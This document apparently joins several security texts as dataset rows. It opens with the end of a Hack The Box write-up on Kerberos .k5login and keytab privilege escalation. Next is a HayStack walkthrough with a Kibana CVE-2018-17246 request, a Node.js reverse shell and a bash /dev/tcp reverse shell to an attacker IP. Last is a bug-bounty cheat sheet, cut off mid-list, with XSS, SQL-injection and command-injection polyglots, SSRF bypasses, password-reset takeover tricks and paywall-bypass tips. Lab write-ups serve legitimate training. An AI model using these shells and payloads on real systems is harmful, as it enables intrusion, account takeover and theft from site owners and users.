2021 from 10.10.14.166\n[j.nakazawa@srv01 ~]$ id\nuid=1000(j.nakazawa) gid=1000(j.nakazawa) groups=1000(j.nakazawa),23(squid),100(users) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\n[j.nakazawa@srv01 ~]$\n```\nHere we finally got the user ...\n\n# Privilege escalation:\n## Escalating 
`admin`: Cronjob abuse\nWhile enumerating the box, I came out with the following `cronjob`:\n```bash\n[j.nakazawa@srv01 ~]$ cat /etc/crontab\nSHELL=/bin/bash\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\n\n# For details see man 4 crontabs\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n* * * * * admin /usr/local/bin/log_backup.sh\n[j.nakazawa@srv01 ~]$\n```\n\n__/usr/local/bin/log_backup.sh__\n```bash\n#!/bin/bash\n\n/usr/bin/rsync -avz --no-perms --no-owner --no-group /var/log/squid/ /home/admin/\ncd /home/admin\n/usr/bin/tar czf squid_logs.tar.gz.`/usr/bin/date +%F-%H%M%S` access.log cache.log\n/usr/bin/rm -f access.log cache.log\n```\nBasically this script copies all the content of `/var/log/squid/` to `/home/admin`.\n\n```bash\n[j.nakazawa@srv01 tmp]$ id\nuid=1000(j.nakazawa) gid=1000(j.nakazawa) groups=1000(j.nakazawa),23(squid),100(users) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\n[j.nakazawa@srv01 tmp]$ ls /var/log -lah | grep squid\ndrwx-wx---. 3 admin squid 53 Jun 19 05:49 squid\n[j.nakazawa@srv01 tmp]$\n```\n\nHere you can see we are in the group of `squid`, we can write and execute the content of `/var/log/squid`. So if we put something into `/var/log/squid` it'll be copied to `/home/admin`. It may take a long or a short time depending on the size of the directory.<br><br>\nThe initial idea was copying our public ssh key to `/home/admin/.ssh/authorized_keys`, but after further testing I came out to the conclusion that it is not allowed/enabled.\n\nHmm let's think about the clue, you remember what was it? 
Yeah, you're right it is literally: `Kerberos`<br>\nAfter some googling, I got [this](https://web.mit.edu/kerberos/krb5-1.5/krb5-1.5.4/doc/krb5-user/Granting-Access-to-Your-Account.html) article.\n\n>If you need to give someone access to log into your account, you can do so through `Kerberos`, without telling the person your password. Simply create a file called `.k5login` in your home directory. This file should contain the `Kerberos principal` of each person to whom you wish to give access. Each principal must be on a separate line. Here is a sample `.k5login` file:\n```\njennifer@ATHENA.MIT.EDU\navid@EXAMPLE.COM\n```\n\nLet's try that:\n```bash\n[j.nakazawa@srv01 ~]$\nmkdir tmp\necho j.nakazawa@REALCORP.HTB | tee tmp/.k5login\ncp tmp/.k5login /var/log/squid\n\nyou@yourlocalmachine:~$\nssh admin@10.10.10.224\n```\n![](src/admin.png)\n\nYupp, that works!\n\n## Escalating `root`: Misconfigured keytab\nActually we noticed this file earlier but as we hadn't had permissions on that, we couldn't use it.<br>\nThe file is: `/etc/krb5.keytab` Fine but,\n\n- What is a [`keytab`](https://kb.iu.edu/d/aumh) file?\n>A keytab is a file containing pairs of Kerberos principals and encrypted keys (which are derived from the Kerberos password). You can use a keytab file to authenticate to various remote systems using Kerberos without entering a password. __Anyone with read permission on a keytab file can use all the keys in the file.__\n\n```bash\n[admin@srv01 ~]$ ls -l /etc/krb5.keytab\n-rw-r-----. 
1 root admin 1403 Dec 19 06:10 /etc/krb5.keytab\n```\nYou see dear `r` letter at the 5th place which stands for __our read permission__'s existence?\n\nLet's see the principals inside `/etc/krb5.keytab`\n```bash\n[admin@srv01 ~]$ klist -k /etc/krb5.keytab\nKeytab name: FILE:/etc/krb5.keytab\nKVNO Principal\n---- --------------------------------------------------------------------------\n 2 host/srv01.realcorp.htb@REALCORP.HTB\n 2 host/srv01.realcorp.htb@REALCORP.HTB\n 2 host/srv01.realcorp.htb@REALCORP.HTB\n 2 host/srv01.realcorp.htb@REALCORP.HTB\n 2 host/srv01.realcorp.htb@REALCORP.HTB\n 2 kadmin/changepw@REALCORP.HTB\n 2 kadmin/changepw@REALCORP.HTB\n 2 kadmin/changepw@REALCORP.HTB\n 2 kadmin/changepw@REALCORP.HTB\n 2 kadmin/changepw@REALCORP.HTB\n 2 kadmin/admin@REALCORP.HTB\n 2 kadmin/admin@REALCORP.HTB\n 2 kadmin/admin@REALCORP.HTB\n 2 kadmin/admin@REALCORP.HTB\n 2 kadmin/admin@REALCORP.HTB\n[admin@srv01 ~]$\n```\n\nThere are `kadmin/admin@REALCORP.HTB` principals, nice!\n\nNow the only thing to do is using [`kadmin`](https://web.mit.edu/kerberos/krb5-1.12/doc/admin/admin_commands/kadmin_local.html) (Kerberos V5 administration system) to add a `root@REALCORP.HTB` principal which we can use with [`ksu`](https://web.mit.edu/kerberos/krb5-latest/doc/user/user_commands/ksu.html) (Kerberized version of the su program) to authenticate as `root` afterwards...\n\n```bash\n[admin@srv01 ~]$\nkadmin -r REALCORP.HTB -p kadmin/admin@REALCORP.HTB -k -t /etc/krb5.keytab\nadd_principal root@REALCORP.HTB\n<Enter a password 2 times>\nexit\nksu root\n<Enter the same password>\n```\n\n![](src/root.png)\n\nAnd we finally R00Ted the machine....\n\n![](/src/gifs/pwned.gif)\n\n---\n\n# Closing\nIf you liked my writeup, consider [suporting](https://www.buymeacoffee.com/f4T1H21) a student to get `OSCP` exam and __+respecting__ my profile in HTB.\n\n<a href=""https://app.hackthebox.eu/profile/184235"">\n <img src=""https://www.hackthebox.eu/badge/image/184235"" alt=""f4T1H"">\n 
</img>\n</a>\n<br>\n<a href=""https://www.buymeacoffee.com/f4T1H21"">\n <img src=""https://raw.githubusercontent.com/f4T1H21/f4T1H21/main/support.png"" height=""40"" alt=""Support"">\n </img>\n</a>\n\n# Resources\n|`CNAME record`|https://en.wikipedia.org/wiki/CNAME_record|\n|:-|:-|\n|__`Proxychains`__|__https://www.youtube.com/watch?v=NN9fQwiomAU__|\n|__`WPAD protocol`__|__https://en.wikipedia.org/wiki/Web_Proxy_Auto-Discovery_Protocol__|\n|__`CVE 2020-7247`__|__https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt__|\n|__`CVE 2020-7247 PoC exploit`__|__https://github.com/f4T1H21/CVE-2020-7247__|\n|__`.k5login file`__|__https://web.mit.edu/kerberos/krb5-1.5/krb5-1.5.4/doc/krb5-user/Granting-Access-to-Your-Account.html__|\n|__`keytab file`__|__https://kb.iu.edu/d/aumh__|\n|__`Kerberos administration program`__|__https://web.mit.edu/kerberos/krb5-1.12/doc/admin/admin_commands/kadmin_local.html__|\n|__`Kerberized su`__|__https://web.mit.edu/kerberos/krb5-latest/doc/user/user_commands/ksu.html__|\n\n<br>\n\n___-Written by f4T1H-___\n"
4,"# HayStack\n\n![eyER9x.png](https://s2.ax1x.com/2019/08/04/eyER9x.png)\n\n## Introduction\n\nTarget: 10.10.10.115(Linux)\n\nKali: 10.10.16.61\n\nHayStack is rated an easy box on Hack The Box, but it isn't easy at all. It's annoying to find the user and password in the messy Spanish. For root, you should have a basic understanding of ELK. That makes the box quite fresh for HTB.\n\n## Information Enumeration\n\nAs usual, nmap is used to detect the open ports and services.\n\n```\n# Nmap 7.70 scan initiated Sun Jun 30 01:10:53 2019 as: nmap -sT -p- --min-rate 1500 -oN ports 10.10.10.115\nNmap scan report for 10.10.10.115\nHost is up (0.27s latency).\nNot shown: 65532 filtered ports\nPORT STATE SERVICE\n22/tcp open ssh\n80/tcp open http\n9200/tcp open wap-wsp\n```\n\nThen detect the detailed services:\n\n```\n# Nmap 7.70 scan initiated Sun Jun 30 01:13:05 2019 as: nmap -sC -sV -p22,80,9200 -oN services 10.10.10.115\nNmap scan report for 10.10.10.115\nHost is up (0.38s latency).\n\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 7.4 (protocol 2.0)\n| ssh-hostkey:\n| 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)\n| 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)\n|_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)\n80/tcp open http nginx 1.12.2\n|_http-server-header: nginx/1.12.2\n|_http-title: Site doesn't have a title (text/html).\n9200/tcp open http nginx 1.12.2\n|_http-server-header: nginx/1.12.2\n|_http-title: 502 Bad Gateway\n```\n\nOn port 80, we find nothing except a picture of a needle. Exiftool is used to analyze it, but nothing interesting is found. Gobuster is used to brute force the directories, but no useful directories are found.\n\n![eDD780.png](https://s2.ax1x.com/2019/08/03/eDD780.png)\n\nFor port 9200, nmap seems to have failed to identify the service. But this port should be familiar to Elasticsearch users. Elasticsearch is a search database that has become popular in recent years. There is something interesting in Elasticsearch. 
We will talk about this later.\n\n![eDrFKO.png](https://s2.ax1x.com/2019/08/03/eDrFKO.png)\n\n## Exploit\n\nAbove, we talked about the ports. Elasticsearch should be the point of interest, so try to obtain its data. By default, Elasticsearch has no authentication. Hence, we can read the data from Elasticsearch. In the beginning, I tried to use Kibana to analyze the data. Kibana is one component of ELK and a powerful tool for analyzing Elasticsearch data. It's also easy to use. Just download the [files](https://www.elastic.co/cn/downloads/past-releases/kibana-6-4-2), then decompress them. There is only one step to finish before running Kibana: modify `elasticsearch.url` in `config.yml` so that it is set to `10.10.10.115:9200`. Then you can run Kibana directly.\n\nWhen you access Kibana, you will find two indexes: `bank` and `quotes`. The `bank` index seems to hold bank users' information, which does not seem useful. In the `quotes` index, we found nothing but quotes in Spanish. To be honest, Spanish is really messy for me to read, and I could not find anything interesting. Kibana is useful for querying specific fields, but `quotes` seems to be an article. So I decided to dump all the data of `quotes`.\n\n[elasticsearch-dump](https://github.com/taskrabbit/elasticsearch-dump) is useful for dumping data from Elasticsearch. First, install the tool with `npm install elasticdump -g`. Then dump the data with:\n\n```\nelasticdump \\n --input=http://production.es.com:9200/quotes \\n --output=quotes.json \\n --type=data\n```\n\nThe result is a JSON file containing a list of objects, each consisting of several keys. The most important key is the quote. But the JSON is still not convenient to read. And the id may be the sequence of the quotes. 
So, I decide to write a script to order the quotes by id and join all the quotes together.\n\n```python\nimport json\nresult = {}\ntxt = """"\nwith open(""quotes.json"") as f:\n data = f.readlines()\n for ele in data:\n obj = json.loads(ele)\n id = int(obj[""_id""])\n result[id] = obj[""_source""][""quote""]\n for i in sorted(result.keys()):\n print(i)\n txt = txt + result[i] + ""\n\n""\nwith open(""result.md"", ""w"") as f1:\n f1.write(txt)\n```\n\nNow, I have the result of quotes. And it's easy to read. I place this file in Github. When I read this file by Chrome, Chrome can help me translate this article. So, it's easier to find special things in the article. I have found two interesting strings in the article.\n\n```\nTengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg\n```\n\n```\nEsta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk=\n```\n\nIf you translate the two stings into English respectively.\n\n```\nI have to save the password for the machine: dXNlcjogc2VjdXJpdHkg\n```\n\n```\nThis key cannot be lost, I keep it here: cGFzczogc3BhbmlzaC5pcy5rZXk=\n```\n\nThe end of the strings is encoded by base64. When decoded, we can find the username and password. Then you can ssh by the username and password. \n\n![erZrTA.png](https://s2.ax1x.com/2019/08/03/erZrTA.png)\n\nTo be honest, I don't like the user of the box. But it does works as the keyword: you have to find a needle in haystack.\n\n## PrivEsc\n\nIf you look around the box, you will find the box is installed with ELK. You can find kibana and logstash in the box. If you google `kibana exploit`. You will find [CVE-2018-17246](https://github.com/mpgn/CVE-2018-17246) in Github. It has detailed illustrates the ways to exploit.\n\nHowever, there is a problem that the kibana service is only running in local. So you cannot access kibana service externally. 
There is a way to utilize ssh to redirect the network stream.\n\n```\nssh 5601:localhost:5601 security@10.10.10.115\n```\n\nThen, we can access to the kibana service in 10.10.10.115 by access to `localhost:5601`. Place the `server.js` in tmp directory of the target machine.\n\n```\n// server.js\n(function(){\n var net = require(""net""),\n cp = require(""child_process""),\n sh = cp.spawn(""/bin/sh"", []);\n var client = new net.Socket();\n client.connect(1234, ""10.10.16.61"", function(){\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n });\n return /a/; // Prevents the Node.js application form crashing\n})();\n```\n\nThen we can implement by burp, remember to set up nc listener `nc -lvnp 1234`\n\n```\nGET /api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../tmp/server.jssudo -l HTTP/1.1\nHost: localhost:5601\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://localhost:5601/app/kibana\ncontent-type: application/json\nkbn-version: 6.4.2\norigin: http://localhost:5601\nConnection: close\n```\n\nWait for a while, then we are kibana.\n\n[![erlWZT.png](https://s2.ax1x.com/2019/08/03/erlWZT.png)](https://imgchr.com/i/erlWZT)\n\nBut we are still not root! Don't be upset. Let's move on. If we look at the logstash in the machine carefully, we will find something interesting. We find the user group `kibana` has write permission of `conf.d` of logstash.\n\n```\nls -lah\ntotal 52K\ndrwxr-xr-x. 3 root root 183 jun 18 22:15 .\ndrwxr-xr-x. 83 root root 8,0K jun 24 05:44 ..\ndrwxrwxr-x. 2 root kibana 62 jun 24 08:12 conf.d\n-rw-r--r--. 1 root kibana 1,9K nov 28 2018 jvm.options\n-rw-r--r--. 1 root kibana 4,4K sep 26 2018 log4j2.properties\n-rw-r--r--. 1 root kibana 342 sep 26 2018 logstash-sample.conf\n-rw-r--r--. 1 root kibana 8,0K ene 23 2019 logstash.yml\n-rw-r--r--. 
1 root kibana 8,0K sep 26 2018 logstash.yml.rpmnew\n-rw-r--r--. 1 root kibana 285 sep 26 2018 pipelines.yml\n-rw-------. 1 kibana kibana 1,7K dic 10 2018 startup.option\n```\n\n`conf.d` is the Logstash config directory, which generally consists of three files. Take a close look into the directory and you'll find something interesting: a command is executed in `output.conf`. If you have basic knowledge of Logstash, you should know the function of the three files. `input.conf` configures the data source. `filter.conf` processes the data and is usually combined with grok. `output.conf` outputs the processed data. We can see that there is an `exec` in `output.conf`.\n\nSo the exploit is very clear. Create a file in `/opt/kibana/` whose name begins with `logstash_`, and make sure the content of the file can be parsed by grok correctly. Then the command can be executed successfully. The most important part is how to create content that is parsed into the correct `comando`, so you should know how to use grok. Grok recognizes specific fields by regular expression. [Grok Debugger] is a useful tool to test grok online.\n\n![eyPIxg.png](https://s2.ax1x.com/2019/08/04/eyPIxg.png)\n\nThe expression is quite simple. If you know regular expressions, it will not be hard to understand the expression here.\n\n**filter.conf**\n\n```\nfilter {\n if [type] == ""execute"" {\n grok {\n match => { ""message"" => ""Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}"" }\n }\n }\n}\n```\n\n**input.conf**\n\n```\ninput {\n file {\n path => ""/opt/kibana/logstash_*""\n start_position => ""beginning""\n sincedb_path => ""/dev/null""\n stat_interval => ""10 second""\n type => ""execute""\n mode => ""read""\n }\n}\n```\n\n**output.conf**\n\n```\noutput {\n if [type] == ""execute"" {\n stdout { codec => json }\n exec {\n command => ""%{comando} &""\n }\n }\n}\n```\n\nNow we know how to create the corresponding `comando`. 
The next step is to choose the command to execute. There is not nc in the machine. But there's python and perl in the machine. But the reverse shell command is a little long. So I choose to use `bash -i >& /dev/tcp/10.10.16.61/1234 0>&1`. Write the content to the corresponding file:\n\n```\necho ""Ejecutar comando: bash -i >& /dev/tcp/10.10.16.61/1234 0>&1"" > /opt/kibana/logstash_1.txt\n```\n\nUse the nc to listen at port 1234, wait a while, root is coming.\n\n![eykUVs.png](https://s2.ax1x.com/2019/08/04/eykUVs.png)\n"
5,"# BugBounty Tips\t\nCollection of `#bugbountytips` from twitter and my bash-jutsu.\n# Recon\n```\nGoogle the company copyright footer to get more domains.\nUse whoxy.com to perform reverse whois lookups with the email used to register the main domain/\nSearch for slide,docs,demos and video tutorials by your target. Manny innocent examples could leak juicy endpoints.\nUse OpenSSL to get certificates. They can contain valuable info and common names form finding more subdomains.\nTry to recreate data from deleted accounts by siging up with the old email address.\nCheck text version of HTML e-mail for template injections\nWhen testing Rails Application add .json to url endpoints.\ncat file | grep -Eo ""(http|https)://[a-zA-Z0-9./?=_-]*""*\ncurl http://host.xx/file.js | grep -Eo ""(http|https)://[a-zA-Z0-9./?=_-]*""* \ngrep -EHirn ""accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into|DB_USER|DB_PASSWORD"" folder/\n```\n\n# Subdomain Enumeration\n```\nsublist3r -d $1 -o $1.txt\nmkdir thirdlevel\necho ""Gathering full third-level domain with sublister""\nfor domain in $(cat $1.txt); do sublist3r -d $domain -o thirdlevel/$domain.txt; cat thirdlevel/$domain.txt | sort -u >> final.txt; done \necho ""Probing for alive third-levels...""\ncat final.txt | httprobe > probed.txt\n```\n\n# subdomain level extraction\n|Regex pattern\t|Domain level match|\n| ------ | ------ |\n|grep -P '^(?:[a-z0-9]+\.){1}[^.]*$'\t|2nd level domains only|\n|grep -P '^(?:[a-z0-9]+\.){2}[^.]*$'\t|3rd level domains only|\n|grep -P '^(?:[a-z0-9]+\.){2,}[^.]*$'\t|3rd level domains or higher|\n|grep -P '^(?:[a-z0-9]+\.){2,3}[^.]*$'\t|3rd to 4th level domains only|\n|grep -P '^(?:[a-z0-9]+\.){3,}[^.]*$'\t|4th level domains or higher|\n\n# Check live \n```\ncat GREPABLENMAP.gnmap | grep 443/open | cut -d ""("" -f 1 | cut -d : -f 2| tr -d "" "" | sed -E 's#https?://##I' | sed -E 's#/.*##' | 
sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew \n```\n# Check live webapps from sublis3r\n```\ncat subdomains.txt | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\*\.?##' | sed -E 's#,#\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\/\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew \n```\n# Filter ffuf output\n```\ncat * | jq | grep ""url\"""" | grep -v ""replayproxyurl"" |grep -v ""proxyurl"" | grep -v ""FUZZ"" | cut -d \"" -f4\n```\n\n# Tools\n```\nUse exiftool to extract metadata from documents, it might reveal vulnerable htmltopdf generators\nUse cloud_enum to find open google buckets or azure accounts \nUse Grep to extract endpoints with grep: grep -o -E '(https?://)?/?[{}a-z0-9A-Z_\.-]{2,}/[{}/a-z0-9A-Z_\.-]+'\nUse WayBackmachine combined with paraminer or parameth\nPassive parameter mining web.archive.org /cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey\n```\n\n# Payloads\n```\nInject payloads in parameter names, ?<script>alerty</script>=true\nUse youtube(olx, etc...) videos with xss in names.\nUse round brackets to inject payload into valid e-mail address.\nX-Forwarded-For: ${payload}\nUse longstring parameters for stacktrace.\nWAFBYPASS ?page="";confirm`1`// Rightwards -> 302; ?pag%65="";confirm`1`// Rightwards -> 200 + XSS!\nRedirect bypass %26next=http://example.com \nWhen testing nodejs site add %ff at the end of url https://target.com/%ff, most of times cause error and return stacktrace with full path\nAdd [] to name of parrameter: pwd= ->pwd[]=\nwhen interacting with db try to put % in parameter ?item=%\n```\n\n# Authentication & Autorization \n```\nUUID Idor Trick, Register user with the same name, it maybe return uuid.\nTry to bruteforce login endpoint. 
/login/${oauth_provider}, login/facebook, login/oauth/twitter login/oauth/v2/yahoo\n403 Forbidden bypass, https://host.com/path =403, https://host.com/%2e/path = 200, \nBypass paywalls by using Google Bot user agent.\nUser securitytrails.com to find the originating server IP\nDo match and replace form false to true.\nSet your birthday for today ot tomorrow to get discounts.\nSkip steps: /step/shipping -> ~~/step/payment~~ -> /step/confirm\nCheck does blackfriday coupon codes expires.\nUse blind xss as password.\nLogin to site using Facebook and try tochange userid during POST requests\n/api/v1/users/profile?id=MYID&id=ANOTHERUSERID -> HTTP 200 \n```\n# Email Restriction bypass\n```\ninti(;inti@inti.io;)@whitelisted.com\n\n→ inti(;\n→ inti@inti.io → my inbox!\n→ ;)@whitelisted.com\n● inti@inti.io(@whitelisted.com)\n● inti+(@whitelisted.com;)@inti.io\n```\n\n# Email Address input fuzz\n```\ntest+(<script>alert(1)</script>)@example.com\ntest@example(<script>alert(1)</script>).com\n""<script>alert(1)</script>""@example.com\n\n""<%=7*7%>""@example.com\ntest+(${{7*7}})@example.com\n\n""'OR 1=1--""@example.com\n""mail');DROP TABLE users;--""@example.com\n\ntest@example.burpcollaborator.net\ntest@[127.0.0.1]\n\nvictim&email=attacker@example.com\n\n""%0d%0aContent-Lenght:%200@0d%0a%0d%0a""@example.com""recipient@test.com>\r\nRCPT TO:<victim+""@test.com\n```\n# Account takeover via Email \n```\nGET /passwordreset\n\nDouble parameter (aka. 
HPP / HTTP parameter pollution):\nemail=victim@xyz.tld&email=hacker@xyz.tld\nCarbon copy:\nemail=victim@xyz.tld%0a%0dcc:hacker@xyz.tld\nUsing separators:\nemail=victim@xyz.tld,hacker@xyz.tld\nemail=victim@xyz.tld%20hacker@xyz.tld\nemail=victim@xyz.tld|hacker@xyz.tld\nNo domain:\nemail=victim\nNo TLD (Top Level Domain):\nemail=victim@xyz\nJSON table:\n{""email"":[""victim@xyz.tld"",""hacker@xyz.tld""]}\n```\n# Password Reset:\n```\nreset userpassword: user@email.com.burpcolaborator.com\n```\n# Find GET parameters in example.com\n```\nassetfinder example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo ""var [a-zA-Z0-9]+"" | sed -e 's,'var','""$url""?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e ""\e[1;33m$url\n\e[1;32m$vars""; done\n```\n\n# Command injection polyglot\n```\n/*$(ping -c 2 example.com)`ping -c 2 example.com``*/-ping -c 2 example.com-'/*$(ping -c 2 example.com)`ping -c 2 example.com` #*/-ping -c 2 example.com||'""||ping -c 2 example.com||""/*`*/\n/*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1``*/-echo 1 >/tmp/rce1-'/*$(echo 1 >/tmp/rce1)`echo 1 >/tmp/rce1` #*/-echo 1 >/tmp/rce1||'""||echo 1 >/tmp/rce1||""/*`*/\n|echo lol2137||a #' |echo lol2137||a #|"" |echo lol2137||a #\n||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\"" |ping -n 21 127.0.0.1\n||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\"" |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net\n||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\"" |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net\n$(sleep 21)\n```\n# SSRF Bypass list for localhost 
(127.0.0.1):\n```\nhttp://127.1/\nhttp://0000::1:80/\nhttp://[::]:80/\nhttp://2130706433/\nhttp://whitelisted@127.0.0.1\nhttp://0x7f000001/\nhttp://017700000001\nhttp://0177.00.00.01\n```\n\n# Top 25 SSRF parameters\n```\n?dest={target}\n?redirect={target}\n?uri={target}\n?path={target}\n?continue={target}\n?url={target}\n?window={target}\n?next={target}\n?data={target}\n?reference={target}\n?site={target}\n?html={target}\n?val={target}\n?validate={target}\n?domain={target}\n?callback={target}\n?return={target}\n?page={target}\n?feed={target}\n?host={target}\n?port={target}\n?to={target}\n?out={target}\n?view={target}\n?dir={target}\n```\n# Top 25 RCE parameters\n```\n?cmd={payload}\n?exec={payload}\n?command={payload}\n?execute{payload}\n?ping={payload}\n?query={payload}\n?jump={payload}\n?code={payload}\n?reg={payload}\n?do={payload}\n?func={payload}\n?arg={payload}\n?option={payload}\n?load={payload}\n?process={payload}\n?step={payload}\n?read={payload}\n?function={payload}\n?req={payload}\n?feature={payload}\n?exe={payload}\n?module={payload}\n?payload={payload}\n?run={payload}\n?print={payload}\n```\n# Top 25 LFI parameters\n```\n?cat={payload}\n?dir={payload}\n?action={payload}\n?board={payload}\n?date={payload}\n?detail={payload}\n?file={payload}\n?download={payload}\n?path={payload}\n?folder={payload}\n?prefix={payload}\n?include={payload}\n?page={payload}\n?inc={payload}\n?locate={payload}\n?show={payload}\n?doc={payload}\n?site={payload}\n?type={payload}\n?view={payload}\n?content={payload}\n?document={payload}\n?layout={payload}\n?mod={payload}\n?conf={payload}\n```\n\n# HackerOne redirect 
parameters\n```\n/[redirect]\n?targetOrigin=[redirect]\n?fallback=[redirect]\n?query=[redirect]\n?redirection_url=[redirect]\n?next=[redirect]\n?ref_url=[redirect]\n?state=[redirect]\n?l=[redirect]\n?redirect_uri=[redirect]\n?forum_reg=[redirect]\n?return_to=[redirect]\n?redirect_url=[redirect]\n?return_url=[redirect]\n?host=[redirect]\n?url=[redirect]\n?redirectto=[redirect]\n?return=[redirect]\n?prejoin_data=[redirect]\n?callback_url=[redirect]\n?path=[redirect]\n?authorize_callback=[redirect]\n?email=[redirect]\n?origin=[redirect]\n?continue=[redirect]\n?domain_name=[redirect]\n?redir=[redirect]\n?wp_http_referer=[redirect]\n?endpoint=[redirect]\n?shop=[redirect]\n?qpt_question_url=[redirect]\n?checkout_url=[redirect]\n?ref_url=[redirect]\n?redirect_to=[redirect]\n?succUrl=[redirect]\n?file=[redirect]\n?link=[redirect]\n?referrer=[redirect]\n?recipient=[redirect]\n?redirect=[redirect]\n?u=[redirect]\n?hostname=[redirect]\n?returnTo=[redirect]\n?return_path=[redirect]\n?image=[redirect]\n?requestTokenAndRedirect=[redirect]\n?retURL=[redirect]\n?next_url=[redirect]\n```\n\n# MORE PARAMETERS\nhttps://github.com/1ndianl33t/Gf-Patterns\n\n# Massive XSS\n```\n#!/bin/bash\n# $1 => example.domain\n\nsubfinder -d $1 -o domains_subfinder_$1\namass enum --passive -d $1 -o domains_$1\n\ncat domains_subfinder_$1 | tee -a domains_$1\ncat domains_$1 | filter-resolved | tee -a domains_$1.txt\n\ncat domains_$1.txt | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt\n```\n# Masive Top Parameters search\n```\nTBA \necho ""http://tesla.com"" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew\n```\n# Juicy GoogleDorks\n```\nsite:example.com inurl:.cgi?\n```\n# File Upload and what to search\n```\nASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE\nSVG: Stored XSS / SSRF / XXE\nGIF: Stored XSS / SSRF\nCSV: CSV injection\nXML: XXE\nAVI: LFI / SSRF\nHTML / JS : HTML injection / XSS / Open redirect\nPNG / JPEG: Pixel flood 
attack (DoS)\nZIP: RCE via LFI / DoS\nPDF / PPTX: SSRF / BLIND XXE\n```\n# File upload chain\n```\n../../../tmp/lol.png —> for path traversal\nsleep(10)-- -.jpg —> for SQL injection\n<svg onload=alert(document.domain)>.jpg/png —> for XSS\n; sleep 10; —> for command injections\n```\n# Find JavaScript Files in Target.com\n```\necho target.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'\nor\ncat domains | httpx -silent | subjs | anew\n```\n# Extract endpoints from \*.js \n```\ncat file.js | grep -aoP ""(?<=(\""|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\""|\'|\`))"" | sort -u\n```\n# Extract juicy data from js \n```\ncat hosts | httpx -silent | subjs | anew | httpx -silent -sr -mc 200 \ngrep -EHirn ""accesskey|admn|aes|api_key|apikey|password|secret|token"" ./output --color\n\n```\n# 403 bypass\n```\nhttps://target.com/admin/ –> HTTP 302 (redirect to login page)\nhttps://target.com/admin..;/ –> HTTP 200 OK\n\nhttps://target.com/../admin\nhttps://target.com/whatever/..;/admin\n\nsite.com/secret –> HTTP 403 Forbidden\nsite.com/secret/ –> HTTP 200 OK\nsite.com/secret/. –> HTTP 200 OK\nsite.com//secret// –> HTTP 200 OK\nsite.com/./secret/.. 
